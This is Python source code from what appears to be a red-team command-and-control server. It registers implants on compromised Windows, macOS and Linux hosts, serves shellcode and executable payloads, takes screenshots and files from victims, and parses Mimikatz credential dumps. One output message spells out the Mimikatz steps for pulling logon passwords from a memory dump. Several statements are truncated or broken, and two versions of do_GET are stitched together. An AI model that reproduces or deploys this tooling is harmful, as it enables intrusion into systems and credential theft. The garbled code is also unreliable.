def newTaskOutput(uriPath, cookieVal, post_data, wsclient=False): now = all_implants = DB.get_implants_all() if not all_implants: print_bad( "Received post request but no implants in database... has the project been cleaned but you're using the same URLs?" ) return for implant in all_implants: implantID = implant.ImplantID RandomURI = implant.RandomURI Hostname = implant.Hostname encKey = implant.Key Domain = implant.Domain User = implant.User if RandomURI in uriPath and cookieVal: DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S"), RandomURI) decCookie = decrypt(encKey, cookieVal) rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:]) if decCookie.startswith("Error"): print(Colours.RED) print("The multicmd errored: ") print(rawoutput) print(Colours.GREEN) return cookieMsg = "" if "-" in decCookie: decCookie = decCookie.strip('\x00') splt = decCookie.split("-") if not splt[0].isdigit(): print(Colours.RED + "[!] Cookie %s is invalid" % decCookie + Colours.GREEN) return else: taskId = str(int(splt[0])) cookieMsg = splt[1] else: taskId = str(int(decCookie.strip('\x00'))) taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId) if taskId != "99999": executedCmd = DB.get_cmd_from_task_id(taskId) task_owner = DB.get_task_owner(taskId) else: print(Colours.END) timenow = now.strftime("%Y-%m-%d %H:%M:%S") print( f"Background task against implant {implantID} on host {Domain}\\{User} @ {Hostname} ({timenow}) (output appended to %sbackground-data.txt)" % ReportsDirectory) print(Colours.GREEN) print(rawoutput) miscData = open(("%sbackground-data.txt" % ReportsDirectory), "a+") miscData.write(rawoutput) return print(Colours.GREEN) if task_owner is not None: print( "Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S"))) else: print( "Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%Y-%m-%d %H:%M:%S"))) try: outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput) outputParsed = outputParsed.rstrip() except Exception: pass if cookieMsg is not None and cookieMsg.lower().startswith( "pwrstatusmsg"): translate_power_status(outputParsed, RandomURI) return if "loadmodule" in executedCmd and len(outputParsed.split()) == 0: print("Module loaded successfully") DB.update_task(taskId, "Module loaded successfully") elif "pbind-connect " in executedCmd and "PBind-Connected" in outputParsed or "PBind PBind start" in executedCmd and "PBind-Connected" in outputParsed: outputParsed ="PBind-Connected:.*", outputParsed) outputParsed = outputParsed[0].replace("PBind-Connected: ", "") Domain, User, Hostname, Arch, PID, Proxy = str( outputParsed).split(";") Proxy = Proxy.replace("\x00", "") if "\\" in User: User = User[User.index("\\") + 1:] PivotString = "C# PBind" if "pbind-command run-exe PBind PBind start" in executedCmd: PivotString = "C# PBind Pivot" newImplant = Implant(implantID, PivotString, str(Domain), str(User), str(Hostname), Arch, PID, None) newImplant.display() newImplant.autoruns() if "pbind-command run-exe PBind PBind start" in executedCmd: DB.new_task("pbind-pivot-loadmodule Stage2-Core.exe", "autoruns", RandomURI) else: DB.new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", RandomURI) elif "fcomm-connect " in executedCmd and "FComm-Connected" in outputParsed: outputParsed ="FComm-Connected:.*", outputParsed) outputParsed = outputParsed[0].replace("FComm-Connected: ", "") Domain, User, Hostname, Arch, PID, Proxy = str( outputParsed).split(";") Proxy = Proxy.replace("\x00", "") if "\\" in User: User = User[User.index("\\") + 1:] newImplant = Implant(implantID, "C# FComm", str(Domain), str(User), str(Hostname), Arch, PID, None) newImplant.display() newImplant.autoruns() DB.new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", RandomURI) elif executedCmd.lower().startswith("beacon "): new_sleep = executedCmd.replace('beacon ', '').strip() DB.update_sleep(new_sleep, RandomURI) elif "get-screenshot" in executedCmd.lower(): try: decoded = base64.b64decode(outputParsed) filename = implant.User + "-" + now.strftime( "%m%d%Y%H%M%S_" + randomuri()) output_file = open( '%s%s.png' % (DownloadsDirectory, filename), 'wb') print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename)) DB.update_task( taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename)) output_file.write(decoded) output_file.close() except Exception: DB.update_task( taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!" ) print( "Screenshot not captured, the screen could be locked or this user does not have access to the screen!" ) elif (executedCmd.lower().startswith("$shellcode64")) or ( executedCmd.lower().startswith("$shellcode64")): DB.update_task(taskId, "Upload shellcode complete") print("Upload shellcode complete") elif (executedCmd.lower().startswith( "run-exe core.program core inject-shellcode" )) or (executedCmd.lower().startswith( "pbind-command run-exe core.program core inject-shellcode" )) or (executedCmd.lower().startswith( "pbind-pivot-command run-exe core.program core inject-shellcode" )): DB.update_task(taskId, "Upload shellcode complete") print(outputParsed) elif "download-file" in executedCmd.lower(): try: filename = executedCmd.lower().replace( "download-files ", "") filename = filename.replace("download-file ", "") filename = filename.replace("-source ", "") filename = filename.replace("..", "") filename = filename.replace("'", "") filename = filename.replace('"', "") filename = filename.replace("\\", "/") directory, filename = filename.rsplit('/', 1) filename = filename.rstrip('\x00') original_filename = filename.strip() if not original_filename: directory = directory.rstrip('\x00') directory = directory.replace("/", "_").replace( "\\", "_").strip() original_filename = directory try: if rawoutput.startswith("Error"): print("Error downloading file: ") print(rawoutput) break chunkNumber = rawoutput[:5] totalChunks = rawoutput[5:10] except Exception: chunkNumber = rawoutput[:5].decode("utf-8") totalChunks = rawoutput[5:10].decode("utf-8") if (chunkNumber == "00001") and os.path.isfile( '%s%s' % (DownloadsDirectory, filename)): counter = 1 while (os.path.isfile('%s%s' % (DownloadsDirectory, filename))): if '.' in filename: filename = original_filename[:original_filename .rfind( '.' )] + '-' + str( counter ) + original_filename[ original_filename .rfind('.'):] else: filename = original_filename + '-' + str( counter) counter += 1 if (chunkNumber != "00001"): counter = 1 if not os.path.isfile('%s%s' % (DownloadsDirectory, filename)): print( "Error trying to download part of a file to a file that does not exist: %s" % filename) while (os.path.isfile('%s%s' % (DownloadsDirectory, filename))): # First find the 'next' file would be downloaded to if '.' in filename: filename = original_filename[:original_filename .rfind( '.' )] + '-' + str( counter ) + original_filename[ original_filename .rfind('.'):] else: filename = original_filename + '-' + str( counter) counter += 1 if counter != 2: # Then actually set the filename to this file - 1 unless it's the first one and exists without a counter if '.' in filename: filename = original_filename[:original_filename .rfind( '.' )] + '-' + str( counter - 2 ) + original_filename[ original_filename .rfind('.'):] else: filename = original_filename + '-' + str( counter - 2) else: filename = original_filename print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename)) DB.update_task( taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename)) output_file = open('%s%s' % (DownloadsDirectory, filename), 'ab') try: output_file.write(rawoutput[10:]) except Exception: output_file.write(rawoutput[10:].encode("utf-8")) output_file.close() except Exception as e: DB.update_task(taskId, "Error downloading file %s " % e) print("Error downloading file %s " % e) traceback.print_exc() elif "safetydump" in executedCmd.lower(): rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:]) if rawoutput.startswith("[-]") or rawoutput.startswith( "ErrorCmd"): DB.update_task(taskId, rawoutput) print(rawoutput) else: dumpname = "SafetyDump-Task-%s.b64" % taskIdStr dumppath = "%s%s" % (DownloadsDirectory, dumpname) open(dumppath, 'w').write(rawoutput) message = "Dump written to: %s" % dumppath message = message + "\n The base64 blob needs decoding, e.g. on Windows to use Mimikatz:" message = message + "\n $filename = '.\\%s'" % dumpname message = message + "\n $b64 = Get-Content $filename" message = message + "\n $bytes = [System.Convert]::FromBase64String($b64)" message = message + "\n [io.file]::WriteAllBytes(((Get-Item -Path \".\\\").FullName) + '\\safetydump.dmp', $bytes)" message = message + "\n ./mimikatz.exe" message = message + "\n sekurlsa::minidump safetydump.dmp" message = message + "\n sekurlsa::logonpasswords" message = message + "\nOr to just decode on Linux:" message = message + f"\n base64 -id {dumpname} > dump.bin" DB.update_task(taskId, message) print(message) elif (executedCmd.lower().startswith("run-exe safetykatz") or "invoke-mimikatz" in executedCmd or executedCmd.lower().startswith("pbind-") or executedCmd.lower().startswith("fcomm-command") or executedCmd.lower().startswith("run-dll sharpsploit") ) and "logonpasswords" in outputParsed.lower(): print("Parsing Mimikatz Output") DB.update_task(taskId, outputParsed) process_mimikatz(outputParsed) print(Colours.GREEN) print(outputParsed + Colours.END) else: DB.update_task(taskId, outputParsed) print(Colours.GREEN) print(outputParsed + Colours.END)
def do_GET(self): try: """Respond to a GET request.""" response_content_len = None response_code = 200 response_content_type = "text/html" response_content = None hosted_files = get_hosted_files() webserver_log("GET request,\nPath: %s\nHeaders:\n%s\n" % (str(self.path), str(self.headers))) self.cookieHeader = self.headers.get('Cookie') self.ref = self.headers.get('Referer') UriPath = str(self.path) sharplist = [] for hosted_file in sharpurls: hosted_file = hosted_file.replace(" ", "") hosted_file = hosted_file.replace("\"", "") sharplist.append("/" + hosted_file) self.server_version = ServerHeader self.sys_version = "" if not self.cookieHeader: self.cookieHeader = "NONE" # implant gets a new task new_task = newTask(self.path) if new_task: response_content = new_task elif [ele for ele in sharplist if(ele in UriPath)]: try: webserver_log("%s - [%s] Making GET connection to SharpSocks %s%s\r\n" % (self.address_string(), self.log_date_time_string(), SocksHost, UriPath)) r = Request("%s%s" % (SocksHost, UriPath), headers={'Accept-Encoding': 'gzip', 'Cookie': '%s' % self.cookieHeader, 'User-Agent': UserAgent}) res = urlopen(r) sharpout = response_content_len = len(sharpout) if (len(sharpout) > 0): response_content = sharpout except HTTPError as e: response_code = e.code webserver_log("[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc())) webserver_log("[-] SharpSocks %s\r\n" % e) except Exception as e: webserver_log("[-] Error with SharpSocks - is SharpSocks running %s%s \r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc())) webserver_log("[-] SharpSocks %s\r\n" % e) print(Colours.RED + f"Unknown C2 comms incoming (Could be old implant or sharpsocks) - {self.client_address[0]} {UriPath}" + Colours.END) response_code = 404 HTTPResponsePage = select_item("GET_404_Response", "C2Server") if HTTPResponsePage: response_content = bytes(HTTPResponsePage, "utf-8") else: response_content = bytes(GET_404_Response, "utf-8") # dynamically hosted files elif [ele for ele in hosted_files if(ele.URI in self.path)]: for hosted_file in hosted_files: if hosted_file.URI == self.path or f"/{hosted_file.URI}" == self.path and hosted_file.Active == "Yes": try: response_content = open(hosted_file.FilePath, 'rb').read() except FileNotFoundError as e: print_bad(f"Hosted file not found (src_addr: {self.client_address[0]}): {hosted_file.URI} -> {e.filename}") response_content_type = hosted_file.ContentType if hosted_file.Base64 == "Yes": response_content = base64.b64encode(response_content) # do this for the python dropper only if "_py" in hosted_file.URI: response_content = "a" + "".join("{:02x}".format(c) for c in response_content) response_content = bytes(response_content, "utf-8") # register new implant elif new_implant_url in self.path and self.cookieHeader.startswith("SessionID"): implant_type = "PS" if self.path == ("%s?p" % new_implant_url): implant_type = "PS Proxy" if self.path == ("%s?d" % new_implant_url): implant_type = "PS Daisy" if self.path == ("%s?m" % new_implant_url): implant_type = "Python" if self.path == ("%s?d?m" % new_implant_url): implant_type = "Python Daisy" if self.path == ("%s?p?m" % new_implant_url): implant_type = "Python Proxy" if self.path == ("%s?c" % new_implant_url): implant_type = "C#" if self.path == ("%s?d?c" % new_implant_url): implant_type = "C# Daisy" if self.path == ("%s?p?c" % new_implant_url): implant_type = "C# Proxy" if self.path == ("%s?j" % new_implant_url): implant_type = "JXA" if self.path == ("%s?e" % new_implant_url): implant_type = "NativeLinux" if self.path == ("%s?p?e" % new_implant_url): implant_type = "NativeLinux Proxy" if implant_type.startswith("C#"): cookieVal = (self.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) Domain, User, Hostname, Arch, PID, ProcName, URLID = decCookie.split(";") URLID = URLID.replace("\x00", "") if "\\" in User: User = User[User.index("\\") + 1:] newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, str(ProcName).lower().replace(".exe",""), int(URLID)) newImplant.display() newImplant.autoruns() response_content = encrypt(KEY, newImplant.SharpCore) elif implant_type.startswith("Python"): cookieVal = (self.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) User, Domain, Hostname, Arch, PID, ProcName, URLID = decCookie.split(";") URLID = URLID.replace("\x00", "") newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, str(ProcName).lower(), URLID) newImplant.display() response_content = encrypt(KEY, newImplant.PythonCore) elif implant_type.startswith("JXA"): cookieVal = (self.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) User, Hostname, PID, ProcName, URLID = decCookie.split(";") Domain = Hostname URLID = URLID.replace("\x00", "") URLID = URLID.replace("\x07", "") newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), "x64", PID, str(ProcName).lower(), URLID) newImplant.display() response_content = encrypt(KEY, newImplant.JXACore) elif implant_type.startswith("NativeLinux"): ProcName = "Linux Dropper" cookieVal = (self.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) User, Domain, Hostname, Arch, PID, URLID = decCookie.split(";") URLID = URLID.replace("\x00", "") newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, str(ProcName).lower().replace(".exe",""), URLID) newImplant.display() response_content=encrypt(KEY, newImplant.NativeCore) else: try: cookieVal = (self.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY.encode("utf-8"), cookieVal) decCookie = str(decCookie) Domain, User, Hostname, Arch, PID, ProcName, URLID = decCookie.split(";") URLID = URLID.replace("\x00", "") IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) if "\\" in str(User): User = User[str(User).index('\\') + 1:] newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, str(ProcName).lower().replace(".exe",""), URLID) newImplant.display() newImplant.autoruns() response_content = encrypt(KEY, newImplant.PSCore) except Exception as e: print("Decryption error: %s" % e) traceback.print_exc() response_code = 404 HTTPResponsePage = select_item("GET_404_Response", "C2Server") if HTTPResponsePage: response_content = bytes(HTTPResponsePage, "utf-8") else: response_content = bytes(GET_404_Response, "utf-8") else: response_code = 404 HTTPResponsePage = select_item("GET_404_Response", "C2Server") if HTTPResponsePage: response_content = bytes(HTTPResponsePage, "utf-8") else: response_content = bytes(GET_404_Response, "utf-8") # send response self.send_response(response_code) self.send_header("Content-type", response_content_type) if response_content_len is not None: self.send_header("Connection", "close") self.send_header("Content-Length", response_content_len) self.end_headers() if response_content is not None: self.wfile.write(response_content) except Exception as e: webserver_log("Error handling GET request: " + str(e)) webserver_log(traceback.format_exc())
def do_GET(self): try: """Respond to a GET request.""""GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers)) new_implant_url = get_newimplanturl() self.cookieHeader = self.headers.get('Cookie') self.ref = self.headers.get('Referer') QuickCommandURI = select_item("QuickCommand", "C2Server") UriPath = str(self.path) sharpurls = get_sharpurls().split(",") sharplist = [] for i in sharpurls: i = i.replace(" ", "") i = i.replace("\"", "") sharplist.append("/" + i) self.server_version = ServerHeader self.sys_version = "" if not self.cookieHeader: self.cookieHeader = "NONE" # implant gets a new task new_task = newTask(self.path) if new_task: self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(new_task) elif [ele for ele in sharplist if (ele in UriPath)]: try: open("%swebserver.log" % PoshProjectDirectory, "a").write( "%s - [%s] Making GET connection to SharpSocks %s%s\r\n" % (self.address_string(), self.log_date_time_string(), SocksHost, UriPath)) r = Request("%s%s" % (SocksHost, UriPath), headers={ 'Accept-Encoding': 'gzip', 'Cookie': '%s' % self.cookieHeader, 'User-Agent': UserAgent }) res = urlopen(r) sharpout = self.send_response(200) self.send_header("Content-type", "text/html") self.send_header("Connection", "close") self.send_header("Content-Length", len(sharpout)) self.end_headers() if (len(sharpout) > 0): self.wfile.write(sharpout) except HTTPError as e: self.send_response(e.code) self.send_header("Content-type", "text/html") self.send_header("Connection", "close") self.end_headers() open("%swebserver.log" % PoshProjectDirectory, "a").write( "[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc())) open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] SharpSocks %s\r\n" % e) except Exception as e: open("%swebserver.log" % PoshProjectDirectory, "a").write( "[-] Error with SharpSocks - is SharpSocks running %s%s \r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc())) open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] SharpSocks %s\r\n" % e) print( Colours.RED + "Error with SharpSocks or old implant connection - is SharpSocks running" + Colours.END) print(Colours.RED + UriPath + Colours.END) self.send_response(404) self.send_header("Content-type", "text/html") self.end_headers() HTTPResponsePage = select_item("GET_404_Response", "C2Server") if HTTPResponsePage: self.wfile.write(bytes(HTTPResponsePage, "utf-8")) else: self.wfile.write(bytes(GET_404_Response, "utf-8")) elif ("%s_bs" % QuickCommandURI) in self.path: filename = "%spayload.bat" % (PayloadsDirectory) with open(filename, 'rb') as f: content = self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%s_rp" % QuickCommandURI) in self.path: filename = "%spayload.txt" % (PayloadsDirectory) with open(filename, 'rb') as f: content = base64.b64encode( self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%s_rg" % QuickCommandURI) in self.path: filename = "%srg_sct.xml" % (PayloadsDirectory) with open(filename, 'rb') as f: content = self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%ss/86/portal" % QuickCommandURI) in self.path: filename = "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = content = base64.b64encode(content) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%ss/64/portal" % QuickCommandURI) in self.path: filename = "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = content = base64.b64encode(content) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%sp/86/portal" % QuickCommandURI) in self.path: filename = "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = content = base64.b64encode(content) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%sp/64/portal" % QuickCommandURI) in self.path: filename = "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = content = base64.b64encode(content) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%s_cs" % QuickCommandURI) in self.path: filename = "%scs_sct.xml" % (PayloadsDirectory) with open(filename, 'rb') as f: content = self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%s_py" % QuickCommandURI) in self.path: filename = "" % (PayloadsDirectory) with open(filename, 'rb') as f: content = content = "a" + "".join("{:02x}".format(c) for c in content) self.send_response(200) self.send_header("Content-type", "text/plain") self.end_headers() self.wfile.write(bytes(content, "utf-8")) elif ("%s_ex86" % QuickCommandURI) in self.path: filename = "%sPosh32.exe" % (PayloadsDirectory) with open(filename, 'rb') as f: content = self.send_response(200) self.send_header("Content-type", "application/x-msdownload") self.end_headers() self.wfile.write(content) elif ("%s_ex64" % QuickCommandURI) in self.path: filename = "%sPosh64.exe" % (PayloadsDirectory) with open(filename, 'rb') as f: content = self.send_response(200) self.send_header("Content-type", "application/x-msdownload") self.end_headers() self.wfile.write(content) # register new implant elif new_implant_url in self.path and self.cookieHeader.startswith( "SessionID"): implant_type = "PS" if self.path == ("%s?p" % new_implant_url): implant_type = "PS Proxy" if self.path == ("%s?d" % new_implant_url): implant_type = "PS Daisy" if self.path == ("%s?m" % new_implant_url): implant_type = "Python" if self.path == ("%s?d?m" % new_implant_url): implant_type = "Python Daisy" if self.path == ("%s?p?m" % new_implant_url): implant_type = "Python Proxy" if self.path == ("%s?c" % new_implant_url): implant_type = "C#" if self.path == ("%s?d?c" % new_implant_url): implant_type = "C# Daisy" if self.path == ("%s?p?c" % new_implant_url): implant_type = "C# Proxy" if implant_type.startswith("C#"): cookieVal = (self.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) Domain, User, Hostname, Arch, PID, Proxy = decCookie.split( ";") Proxy = Proxy.replace("\x00", "") if "\\" in User: User = User[User.index("\\") + 1:] newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy) newImplant.display() newImplant.autoruns() responseVal = encrypt(KEY, newImplant.SharpCore) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(responseVal) elif implant_type.startswith("Python"): cookieVal = (self.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) User, Domain, Hostname, Arch, PID, Proxy = decCookie.split( ";") Proxy = Proxy.replace("\x00", "") newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy) newImplant.display() responseVal = encrypt(KEY, newImplant.PythonCore) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(responseVal) else: try: cookieVal = (self.cookieHeader).replace( "SessionID=", "") decCookie = decrypt(KEY.encode("utf-8"), cookieVal) decCookie = str(decCookie) Domain, User, Hostname, Arch, PID, Proxy = decCookie.split( ";") Proxy = Proxy.replace("\x00", "") IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) if "\\" in str(User): User = User[str(User).index('\\') + 1:] newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy) newImplant.display() newImplant.autoruns() responseVal = encrypt(KEY, newImplant.PSCore) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(responseVal) except Exception as e: print("Decryption error: %s" % e) traceback.print_exc() self.send_response(404) self.send_header("Content-type", "text/html") self.end_headers() HTTPResponsePage = select_item("GET_404_Response", "C2Server") if HTTPResponsePage: self.wfile.write(bytes(HTTPResponsePage, "utf-8")) else: self.wfile.write(bytes(GET_404_Response, "utf-8")) else: self.send_response(404) self.send_header("Content-type", "text/html") self.end_headers() HTTPResponsePage = select_item("GET_404_Response", "C2Server") if HTTPResponsePage: self.wfile.write(bytes(HTTPResponsePage, "utf-8")) else: self.wfile.write(bytes(GET_404_Response, "utf-8")) except Exception as e: if 'broken pipe' not in str(e).lower(): print_bad("Error handling GET request: " + e) traceback.print_exc()